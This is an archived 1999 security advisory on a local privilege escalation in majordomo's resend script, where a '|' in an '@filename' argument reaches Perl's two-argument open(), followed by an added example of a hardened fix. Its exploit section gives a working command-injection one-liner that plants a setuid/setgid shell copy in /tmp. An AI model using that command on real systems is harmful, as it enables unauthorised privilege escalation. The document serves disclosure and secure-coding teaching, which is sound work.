
majordomo.local.txt

Reported by Brock Tellier, 31 Dec 1999. Type: packetstorm. Source: packetstormsecurity.com. 42 views.

Local exploit in majordomo allows privilege escalation through vulnerable resend script.

Code
```
---------- Forwarded message ----------
Date: 28 Dec 99 20:47:44 CST
From: Brock Tellier <[email protected]>
Subject: majordomo local exploit

OVERVIEW
A vulnerability in majordomo allows local users to gain elevated
privileges.

BACKGROUND
I've only tested the version of majordomo which comes with UnixWare
7.1 which is 1.94.4. This vulnerability may or may not still be present
in newer versions of majordomo, but it exists on the default UW7.1
installation.

Thanks to rain.forest.puppy for his paper on how to exploit CGI/perl
scripts, as it helped me out in this exploit. Grab it at
http://www.wiretrip.net/rfp/p/doc.asp?id=6&iface=2

DETAILS
The majordomo wrapper allows users to run programs in the
/usr/local/majordomo directory with the uid of owner and the gid of
daemon. The permissions for wrapper are:

-rwsr-xr-x 1 root daemon 6464 Jan 4 1999
/usr/local/majordomo/wrapper

but wrapper immediately setuid()'s and setgid()'s to owner:daemon before
execing the wrapped program.

A vulnerability in "/usr/local/majordomo/resend" will allow us to execute
arbitrary commands with our elevated privileges. The following code
snippet appears in resend, a perl script:

-snip-

# If the first argument is "@filename", read the real arguments
# from "filename", and shove them onto the ARGV for later processing
# by &Getopts()
#
if ($ARGV[0] =~ /^\@/) {
    $fn = shift(@ARGV);
    $fn =~ s/^@//;
    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");

-snip-

As you can see, if our first argument to resend starts with a "@",
resend will attempt to open() the filename. However, open() can
also be used to run programs if the first argument to open() begins
with a pipe "|". If our first argument is "@|id", resend will run
the program "id" with full privileges.

EXPLOIT

Our exploit is simple:

bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh
/tmp/xnec;chmod 6555 /tmp/xnec'
resend: must specify '-l list' at /usr/local/majordomo/resend line 77.

bash-2.02$ ls -la /tmp/xnec
-r-sr-sr-x 1 owner daemon 361688 Dec 29 06:26 /tmp/xnec

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]
```
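The root cause above is Perl's two-argument open(), where the opened string itself selects the mode (a leading "|" means "pipe to a command"). As an added illustration that is not part of Tellier's advisory or of the majordomo code, the following shows that pattern beside a hardened form that fixes the mode with three-argument open() and allow-lists the file name; the function names and the temporary path are assumptions.

```perl
#!/usr/bin/perl
# Added example, not from the advisory or from majordomo itself.
use strict;
use warnings;

# Vulnerable pattern, as in resend: two-argument open() lets the data
# choose the mode. A name starting with "|" is treated as a command to
# pipe to, so an "@|..." argument runs that command with the wrapper's
# privileges. Shown for comparison only; it is never called below.
sub read_args_vulnerable {
    my ($fn) = @_;
    $fn =~ s/^@//;
    open(my $av, $fn) or die "open($fn): $!";   # mode comes from $fn
    my @args = map { chomp; $_ } <$av>;
    close($av);
    return @args;
}

# Hardened version: three-argument open() pins the mode to read-only, so
# "|", ">" and "<" in $fn are just literal filename characters, and an
# allow-list rejects anything that is not a plain path (this also
# untaints $fn under "perl -T").
sub read_args_safe {
    my ($fn) = @_;
    $fn =~ s/^@//;
    die "refusing argument file name: $fn\n"
        unless $fn =~ m{^([\w./-]+)$};      # letters, digits, _ . / - only
    $fn = $1;                               # validated, untainted copy
    die "not a regular file: $fn\n" unless -f $fn;
    open(my $av, '<', $fn) or die "open($fn): $!";
    my @args = map { chomp; $_ } <$av>;
    close($av);
    return @args;
}

# Demonstration with a constructed argument file (assumed path).
my $tmp = "/tmp/resend-args.$$";
open(my $w, '>', $tmp) or die "create $tmp: $!";
print $w "-l\nmylist\n";
close($w);

print join(' ', read_args_safe("\@$tmp")), "\n";   # -l mylist
eval { read_args_safe('@|id') };                   # refused, nothing runs
print "rejected: $@";
unlink $tmp;
```

Run it under `perl -T` as well: with taint mode on, the allow-list match is what makes the later file operations legal, which is a cheap way to catch any code path that still hands unvalidated input to open().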

Vulners AI Score: 7.4 (High risk)